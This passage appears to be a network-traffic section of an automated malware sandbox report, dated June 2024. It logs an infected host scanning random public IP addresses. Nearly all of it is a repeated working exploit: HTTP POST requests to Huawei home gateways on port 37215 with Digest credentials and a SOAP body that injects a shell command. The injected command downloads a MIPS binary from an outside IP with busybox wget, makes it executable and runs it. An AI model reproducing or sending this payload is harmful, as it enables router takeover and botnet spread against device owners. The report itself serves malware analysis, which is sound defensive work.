20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            767192.168.2.1345604197.100.179.17937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.745716095 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            768192.168.2.134895441.242.83.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.748142958 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            769192.168.2.1345224197.93.109.12037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.749573946 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            770192.168.2.134821641.96.242.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.750600100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            771192.168.2.1353884197.255.245.237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.751686096 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            772192.168.2.1357264197.69.40.3937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.752803087 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            773192.168.2.133297041.102.226.837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.753767014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            774192.168.2.1359676197.243.121.22837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.754765987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            775192.168.2.1337358156.165.101.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.756023884 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            776192.168.2.1344434156.248.183.4737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.757282972 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            777192.168.2.1333982197.200.122.25237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.758343935 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
